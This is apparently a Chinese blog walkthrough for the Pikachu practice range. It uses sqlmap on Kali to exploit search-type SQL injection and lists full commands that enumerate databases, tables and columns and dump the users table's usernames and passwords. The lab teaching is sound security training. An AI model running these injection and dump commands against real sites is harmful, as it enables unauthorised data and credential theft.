pikachu靶场——SQL-Inject—3(Kali系统)

文章目录

今天复现搜索型型注入和xx型注入的案例。本文仅用于合法授权的渗透测试场景,旨在帮助开发者识别sql注入漏洞、提升Web应用安全性,严禁用于未授权攻击!网络安全无小事,违规操作将承担相应法律责任。

一、链接分析

通过随机输入字符串,可以看到搜索型注入和xx型注入的提交请求都为 get 请求,其中搜索型注入的数据报为

xx型数据包为:

然后通过 sqlmap 对这两个地址进行扫描,发现其存在的 sql 漏洞依然为 布尔盲注漏洞(boolen-based blind)、报错注入(error-based)、时间盲注(time-based blind)、联合查询注入(union query).

其中

  • 联合查询注入(union query)在pikachu靶场------SQL-Inject---1(Kali系统)已经复现,可以对照的在这个接口进行尝试。
  • 报错注入(error-based)在pikachu靶场------SQL-Inject---2(Kali系统)完成复现 **(审核一直通不过,有需要的话可以留言)
    **,可参考进行尝试。

二、kali 漏洞扫描

今天主要使用 kali 的 sqlmap 实现对漏洞的注入,获取对应的数据库,数据表,数据结构以及具体的数据。本章以搜索型注入为例。

(一)获取数据库

添加 --current-db,完整命令为:

shell 复制代码
sqlmap -u 'http://192.168.0.20/pikachu/vul/sqli/sqli_search.php?name=pika&submit=%E6%90%9C%E7%B4%A2' --random-agent --proxy='http://127.0.0.1:8080' --batch --current-db

主要是显示当前连接的数据,返回信息为:

如果需要返回所有数据库,添加 --dbs命令为:

shell 复制代码
sqlmap -u 'http://192.168.0.20/pikachu/vul/sqli/sqli_search.php?name=pika&submit=%E6%90%9C%E7%B4%A2' --random-agent --proxy='http://127.0.0.1:8080' --batch --dbs

这里返回的是目标主机所有的数据库,根据实际会有所不同。

(二)获取数据表

需要传入想要查询的数据库名称,-D pikachu --tables,完整命令为:

shell 复制代码
sqlmap -u 'http://192.168.0.20/pikachu/vul/sqli/sqli_search.php?name=pika&submit=%E6%90%9C%E7%B4%A2' --random-agent --proxy='http://127.0.0.1:8080' --batch -D pikachu --tables

(三)获取数据表字段信息

需要传入想要查询的数据表名称,-D pikachu --T users --columns,完整命令为:

shell 复制代码
sqlmap -u 'http://192.168.0.20/pikachu/vul/sqli/sqli_search.php?name=pika&submit=%E6%90%9C%E7%B4%A2' --random-agent --proxy='http://127.0.0.1:8080' --batch -D pikachu -T user --columns

(四)获取数据

需要传入想要查询的数据表字段名称,-D pikachu --T users --columns,完整命令为:

shell 复制代码
sqlmap -u 'http://192.168.0.20/pikachu/vul/sqli/sqli_search.php?name=pika&submit=%E6%90%9C%E7%B4%A2' --random-agent --proxy='http://127.0.0.1:8080' --batch -D pikachu -T users -C level,id,password,username --dump

总结

对于使用 kali 的sqlmap 工具进行 sql注入时,其具体命令格式如下:

bash 复制代码
# 获取所有数据库
sqlmap -u "目标URL" --dbs
# 获取当前数据库
sqlmap -u "目标URL" --current-db
# 获取表
sqlmap -u "目标URL" -D pikachu --tables
# 获取字段
sqlmap -u "目标URL" -D pikachu -T users --columns
# 获取数据
sqlmap -u "目标URL" -D pikachu -T users -C username,password --dump
相关推荐
TDengine (老段)3 分钟前
TDengine IDMP 可视化 ——柱状图
大数据·数据库·物联网·时序数据库·iot·tdengine·涛思数据
Meepo_haha4 分钟前
Spring boot 3.3.1 官方文档 中文
java·数据库·spring boot
xcLeigh8 分钟前
KES数据库数据类型与SQL高级语法
大数据·数据库·sql·kes·高级语法·数据选型
入瘾9 小时前
etcd 显示连接失败
数据库·chrome·etcd
本体智能9 小时前
预制指标、宽表、SQL、本体ABC:真正决定长期成本的,是一次变更会波及多少层
数据库·sql·本体神经网络·uino数据智能引擎
长安11089 小时前
数据库基础知识----数据库大观
数据库·oracle
瀚高PG实验室10 小时前
使用hgdbdeveloper开发工具导出数据后在异机恢复时报错
数据库·瀚高数据库
百结21411 小时前
PostgreSQL 初体验
数据库·postgresql
ward RINL11 小时前
Redis 安装及配置教程(Windows)【安装】
数据库·windows·redis
bingHHB12 小时前
金蝶云星空旗舰版 × 赛狐ERP:亚马逊卖家业财一体化的最后一公里
运维·数据库·集成学习